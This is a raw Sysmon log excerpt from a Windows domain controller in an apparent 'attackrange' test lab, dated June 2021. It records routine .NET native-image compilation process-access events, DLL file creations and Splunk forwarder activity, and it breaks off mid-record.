21:06:10.328{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A242-60D3-A104-00000000CF01}6532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 354300x800000000000000021872Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.109{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61448-false10.0.1.12-8000- 10341000x800000000000000021871Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:11.937{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A243-60D3-A904-00000000CF01}3112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021870Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:11.921{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A243-60D3-A904-00000000CF01}3112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021869Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:11.921{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A243-60D3-A904-00000000CF01}3112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021868Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:11.890{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A243-60D3-A804-00000000CF01}2376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021867Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:11.875{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A243-60D3-A804-00000000CF01}2376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021866Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:11.875{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A243-60D3-A804-00000000CF01}2376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021865Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:11.812{4DB9351A-A243-60D3-A704-00000000CF01}6920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b08-0\System.Net.Http.WebRequest.dll2021-06-23 21:06:11.812 23542300x800000000000000021864Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:11.796{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96A2A6E96F5D7EEC78DE43B51A7CF5D7,SHA256=AA7018C57DA60B4ED0BBDADC96980509DBD82B706DAFDBBC429438794D133FF1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021863Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:11.749{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A243-60D3-A704-00000000CF01}6920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021862Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:11.718{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A243-60D3-A704-00000000CF01}6920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021861Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:11.718{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A243-60D3-A704-00000000CF01}6920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000021860Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:11.671{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8F32382012D0FFF26839C3B21A985F10,SHA256=42D06A649C4C23FFA4294DA63C7FE73CC9C509A9AE278C2D9F34E81426812B87,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021859Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:11.612{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A243-60D3-A604-00000000CF01}6492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021858Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:11.578{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A243-60D3-A604-00000000CF01}6492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021857Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:11.578{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A243-60D3-A604-00000000CF01}6492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021856Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:11.500{4DB9351A-A243-60D3-A504-00000000CF01}4196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1064-0\System.Net.dll2021-06-23 21:06:11.500 10341000x800000000000000021855Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:11.203{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A243-60D3-A504-00000000CF01}4196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021854Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:11.187{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A243-60D3-A504-00000000CF01}4196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021853Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:11.187{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A243-60D3-A504-00000000CF01}4196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021852Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:11.140{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A243-60D3-A404-00000000CF01}2212C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021851Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:11.124{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A243-60D3-A404-00000000CF01}2212C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021850Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:11.124{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A243-60D3-A404-00000000CF01}2212C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021849Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:11.015{4DB9351A-A242-60D3-A304-00000000CF01}5516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\158c-0\System.Messaging.dll2021-06-23 21:06:11.015 11241100x800000000000000021889Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:12.937{4DB9351A-A244-60D3-AD04-00000000CF01}772C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\304-0\System.Reflection.Context.dll2021-06-23 21:06:12.937 10341000x800000000000000021888Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:12.828{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A244-60D3-AD04-00000000CF01}772C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021887Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:12.812{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A244-60D3-AD04-00000000CF01}772C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021886Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 